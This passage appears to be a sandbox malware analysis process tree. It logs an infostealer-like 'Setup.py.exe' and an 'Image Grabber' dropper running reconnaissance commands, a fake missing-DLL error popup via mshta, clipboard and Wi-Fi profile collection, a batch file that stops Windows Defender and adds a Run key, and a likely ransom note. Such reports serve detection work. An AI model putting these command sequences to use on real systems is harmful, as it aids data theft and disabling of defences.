  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1300 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6880 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6368 /prefetch:8
  2⤵
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,8038589199238835979,192774271905222068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6876 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4544
- C:\Users\Admin\Downloads\Setup.py.exe
  "C:\Users\Admin\Downloads\Setup.py.exe"
  2⤵
  - Executes dropped EXE
  PID:1324
- - C:\Users\Admin\Downloads\Setup.py.exe
    "C:\Users\Admin\Downloads\Setup.py.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:776
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:4596
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
      4⤵
      PID:3540
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
        5⤵
        
        PID:2280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:1028
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2184
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4056"
      4⤵
      PID:3588
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4056
        5⤵
        Kills process with taskkill
        
        PID:1796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2028"
      4⤵
      PID:4040
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2028
        5⤵
        Kills process with taskkill
        
        PID:3704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2656"
      4⤵
      PID:2892
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2656
        5⤵
        Kills process with taskkill
        
        PID:5068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3060"
      4⤵
      PID:3960
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3060
        5⤵
        Kills process with taskkill
        
        PID:5040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 676"
      4⤵
      PID:4924
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 676
        5⤵
        Kills process with taskkill
        
        PID:1692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1936"
      4⤵
      PID:776
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1936
        5⤵
        Kills process with taskkill
        
        PID:4164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4660"
      4⤵
      PID:740
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4660
        5⤵
        Kills process with taskkill
        
        PID:1008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 912"
      4⤵
      PID:3556
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 912
        5⤵
        Kills process with taskkill
        
        PID:2328
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4988"
      4⤵
      PID:4456
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4988
        5⤵
        Kills process with taskkill
        
        PID:5056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4192"
      4⤵
      PID:4912
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4192
        5⤵
        Kills process with taskkill
        
        PID:1888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4628"
      4⤵
      PID:896
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4628
        5⤵
        Kills process with taskkill
        
        PID:700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
      4⤵
      PID:3156
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        5⤵
        
        PID:408
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:4968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
      4⤵
      PID:1912
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        5⤵
        
        PID:1636
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:4504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1932
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
      4⤵
      PID:1048
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
      4⤵
      PID:2380
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:2748
    - - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        5⤵
        
        PID:4172
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        5⤵
        Collects information from the system
        
        PID:3648
    - - C:\Windows\system32\net.exe
        
        net user
        5⤵
        
        PID:4660
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        6⤵
        
        PID:3076
    - - C:\Windows\system32\query.exe
        
        query user
        5⤵
        
        PID:3884
      - C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        6⤵
        
        PID:444
    - - C:\Windows\system32\net.exe
        
        net localgroup
        5⤵
        
        PID:2884
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        6⤵
        
        PID:3552
    - - C:\Windows\system32\net.exe
        
        net localgroup administrators
        5⤵
        
        PID:5092
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        6⤵
        
        PID:4192
    - - C:\Windows\system32\net.exe
        
        net user guest
        5⤵
        
        PID:2420
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        6⤵
        
        PID:912
    - - C:\Windows\system32\net.exe
        
        net user administrator
        5⤵
        
        PID:2732
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        6⤵
        
        PID:2148
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        5⤵
        
        PID:628
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        5⤵
        Enumerates processes with tasklist
        
        PID:4072
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        5⤵
        Gathers network information
        
        PID:4680
    - - C:\Windows\system32\ROUTE.EXE
        
        route print
        5⤵
        
        PID:1176
    - - C:\Windows\system32\ARP.EXE
        
        arp -a
        5⤵
        
        PID:3040
    - - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        5⤵
        Gathers network information
        
        PID:4796
    - - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        5⤵
        Launches sc.exe
        
        PID:3148
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        5⤵
        Modifies Windows Firewall
        
        PID:856
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        5⤵
        Modifies Windows Firewall
        
        PID:2284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      PID:5024
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:4384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:8
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:1756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:4344
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:860

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3012

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2904

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:444

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\EditPush.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2400

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Public\Desktop\@[email protected]"
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:4536

C:\Users\Public\Desktop\@[email protected]
"C:\Users\Public\Desktop\@[email protected]"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1796

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1000

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Image Grabber.rar"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2636
- C:\Users\Admin\AppData\Local\Temp\7zOC4AAC089\image grabber.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC4AAC089\image grabber.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3124
- - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\GRABBER.EXE
    "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\GRABBER.EXE"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:4628
- - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMAGE LOGGER.EXE
    "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMAGE LOGGER.EXE"
    3⤵
    - Executes dropped EXE
    PID:1496
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMAGE LOGGER.EXE
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMAGE LOGGER.EXE"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4876
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:4956
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c title xyz
        5⤵
        
        PID:444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:3932
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2524
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:1632
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\LOL.BAT" "
    3⤵
    - Checks computer location settings
    - Modifies registry class
    PID:1260
  - - C:\Windows\SysWOW64\net.exe
      net stop"WinDefend"
      4⤵
      PID:1012
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop"WinDefend"
        5⤵
        
        PID:4500
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /t /im "MSASCui.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:540
  - - C:\Windows\SysWOW64\reg.exe
      reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\LOL.BAT" /f
      4⤵
      Adds Run key to start application
      PID:944
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zOC4AAC089\XD.vbs"
      4⤵
      PID:2524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:1584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x40,0x120,0x124,0xfc,0x128,0x7ffec24046f8,0x7ffec2404708,0x7ffec2404718
  2⤵
  PID:2936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
  2⤵
  PID:1404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2988 /prefetch:8
  2⤵
  PID:2448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:3576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
  2⤵
  PID:3556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
  2⤵
  PID:3060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
  2⤵
  PID:3336
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3676 /prefetch:8
  2⤵
  PID:4816
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3676 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
  2⤵
  PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
  2⤵
  PID:1720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
  2⤵
  PID:1004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3652 /prefetch:8
  2⤵
  PID:4320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4300 /prefetch:1
  2⤵
  PID:5088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2028 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
  2⤵
  PID:2436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
  2⤵
  PID:4704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
  2⤵
  PID:992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5468 /prefetch:8
  2⤵
  PID:3812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
  2⤵
  PID:4588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
  2⤵
  PID:3804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6344 /prefetch:8
  2⤵
  PID:4324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
